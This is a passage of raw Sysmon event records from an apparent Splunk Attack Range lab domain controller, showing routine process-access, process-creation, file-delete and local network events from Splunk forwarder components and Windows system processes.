13:52:18.909{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200107Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200106Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E612-6040-D14D-00000000AD01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200105Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.909{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E612-6040-D14D-00000000AD01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200104Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.910{5ABCFE62-E612-6040-D14D-00000000AD01}6136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002200103Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.706{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4333CEB1C0123F61DCF1C96D959EEA,SHA256=982C9886BD15149DBA657B9FE4BDC44CD55E39DF22C80C9233D97496F6B8BAAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200102Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.597{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6035757410636225FDADED1288C54A5,SHA256=B3E8D92A529E062CC8FDCB19B39F189A783CEB9E08AA17C063D45EFD8021F503,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200101Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E612-6040-D04D-00000000AD01}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200100Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200099Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200098Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200097Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200096Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E612-6040-D04D-00000000AD01}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200095Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.237{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E612-6040-D04D-00000000AD01}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200094Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.238{5ABCFE62-E612-6040-D04D-00000000AD01}4676C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200122Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.706{5ABCFE62-E613-6040-D24D-00000000AD01}59804360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200121Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.706{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21AE808E28549147639092C7C82339E8,SHA256=89C5020B7DD16D169A28C983618F5E8C778274D747AFC454CB10340E24864DE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200120Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E613-6040-D24D-00000000AD01}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200119Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200118Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200117Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200116Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200115Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E613-6040-D24D-00000000AD01}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200114Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.581{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E613-6040-D24D-00000000AD01}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200113Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.582{5ABCFE62-E613-6040-D24D-00000000AD01}5980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200112Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.034{5ABCFE62-E612-6040-D14D-00000000AD01}61362424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200125Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:20.722{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46F8CAC1420839B0BCB070FD7263B33B,SHA256=950292D7CA79E04F90C95FE3450DEC46749528A14CACEB3515349E2079112A3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200124Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:16.888{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55102-false10.0.1.12-8000- 23542300x80000000000000002200123Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:20.128{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2CE27C3C701968B90F3B5FC34AB670D,SHA256=10B427ED602327CC2AF2709DD314AEC9ABF9A8E882708D763AA28096D8C5A7D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200128Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:21.737{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E95D60C593B7D27FE0044A3BA3EE1C56,SHA256=AE51C2C18DFFCE371A1DB33F2DB1B4E8E21B15BBFB389C7A7F2F6652209F543B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200127Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:18.154{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55337- 23542300x80000000000000002200126Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:21.519{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE1D2E3E511303D51798F707B074AF23,SHA256=AFFE6E1F1A2EF870EB0FE5F97AD60381FE1ACAD37F2443C6402CBB6A8C687B7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200130Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:22.816{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3F230959917731CE9A954436B34B3C4,SHA256=E1F0A556A9A59A50EBEB909333149A11BB2A8B6BABFDEF617852D3C958962BD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200129Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:22.191{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL 